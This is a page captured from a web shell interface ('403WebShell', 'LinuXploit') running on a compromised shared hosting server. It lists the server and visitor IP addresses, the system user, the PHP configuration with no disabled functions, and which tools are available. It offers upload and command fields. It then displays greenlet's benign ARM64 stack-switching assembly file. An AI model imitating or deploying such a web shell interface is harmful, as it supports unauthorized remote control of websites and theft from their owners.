Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.216.92.5
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/hc_python/lib64/python3.8/site-packages/greenlet/platform/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/hc_python/lib64/python3.8/site-packages/greenlet/platform//switch_arm64_masm.asm
  AREA switch_arm64_masm, CODE, READONLY;
  GLOBAL slp_switch [FUNC]
  EXTERN slp_save_state_asm
  EXTERN slp_restore_state_asm

slp_switch    
    ; push callee saved registers to stack
    stp    x19, x20, [sp, #-16]!
    stp    x21, x22, [sp, #-16]!
    stp    x23, x24, [sp, #-16]!
    stp    x25, x26, [sp, #-16]!
    stp    x27, x28, [sp, #-16]!
    stp    x29, x30, [sp, #-16]!
    stp    d8, d9, [sp, #-16]!
    stp    d10, d11, [sp, #-16]!
    stp    d12, d13, [sp, #-16]!
    stp    d14, d15, [sp, #-16]!

    ; call slp_save_state_asm with stack pointer
    mov x0, sp
    bl    slp_save_state_asm

    ; early return for return value of 1 and -1
    cmp x0, #-1
    b.eq RETURN
    cmp x0, #1
    b.eq RETURN

    ; increment stack and frame pointer
    add sp, sp, x0
    add x29, x29, x0

    bl slp_restore_state_asm

    ; store return value for successful completion of routine
    mov x0, #0

RETURN
    ; pop registers from stack
    ldp d14, d15, [sp], #16
    ldp d12, d13, [sp], #16
    ldp d10, d11, [sp], #16
    ldp d8, d9, [sp], #16
    ldp x29, x30, [sp], #16
    ldp x27, x28, [sp], #16
    ldp x25, x26, [sp], #16
    ldp x23, x24, [sp], #16
    ldp x21, x22, [sp], #16
    ldp x19, x20, [sp], #16

    ret

    END

Youez - 2016 - github.com/yon3zu
LinuXploit